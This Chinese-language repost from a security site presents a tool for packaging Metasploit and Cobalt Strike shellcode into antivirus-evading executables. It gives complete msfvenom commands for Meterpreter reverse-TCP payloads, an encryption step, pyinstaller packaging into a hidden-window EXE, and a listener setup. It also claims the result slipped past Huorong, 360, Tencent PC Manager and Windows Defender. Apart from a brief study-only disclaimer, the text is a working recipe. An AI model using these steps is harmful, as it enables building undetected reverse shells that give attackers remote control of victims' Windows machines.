神兵利器 | CS/MSF免杀ShellCode加载器

华盟原创文章投稿奖励计划

神兵利器 | CS/MSF免杀ShellCode加载器

ShellCode_Loader:Msf & CobaltStrike免杀ShellCode加载器;Shellcode_encryption:免杀Shellcode加密生成工具;

注:截至2022年9月3日测试时Windows 10可免国内杀软:火绒&360&电脑管家及Windows Defender(其他杀软自测)。

生成Payload

Metasploit,输出c、py格式,可用xor、xor_dynamic、zutto_dekiru编码器。

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c  -o  payload.cmsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f py -o  payload_py.cmsfvenom -e x64/xor -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c -o payload_xor.cmsfvenom -e x64/xor_dynamic -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c -o payload_xor_dynamic.cmsfvenom -e x64/zutto_dekiru -p windows/x64/meterpreter/reverse_tcp lhost=192.168.30.20 lport=8899 -f c -o payload_zutto_dekiru.c

CobaltStrike,这里选择使用x64的C语言或Python语言的Shellcode。
神兵利器 | CS/MSF免杀ShellCode加载器神兵利器 | CS/MSF免杀ShellCode加载器
得到一个payload.c的文件,内容为:神兵利器 | CS/MSF免杀ShellCode加载器

加密Payload

Shellcode_encryption.exe payload_c.c

神兵利器 | CS/MSF免杀ShellCode加载器

配置ShellCode加载器

成的密文ShellCode 填至 ShellCode_Loader.py 里的 Data = '密文Shellcode' 处 示例:

神兵利器 | CS/MSF免杀ShellCode加载器

最终格式:神兵利器 | CS/MSF免杀ShellCode加载器

打包EXE可执行程序

编译环境:Python 3.8.6、pyinstaller 4.7,生成ShellCode_Loader.exe在dist目录中。

pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simplepyinstaller -F -w ShellCode_Loader.py

上线测试

msfconsolemsf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 0.0.0.0msf6 exploit(multi/handler) > set lport 8080msf6 exploit(multi/handler) > run

神兵利器 | CS/MSF免杀ShellCode加载器神兵利器 | CS/MSF免杀ShellCode加载器

文章来源:Hack分享吧

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


www.idc126.com

END

神兵利器 | CS/MSF免杀ShellCode加载器

本文来源Hack分享吧,经授权后由华盟君发布,观点不代表华盟网的立场,转载请联系原作者。

发表评论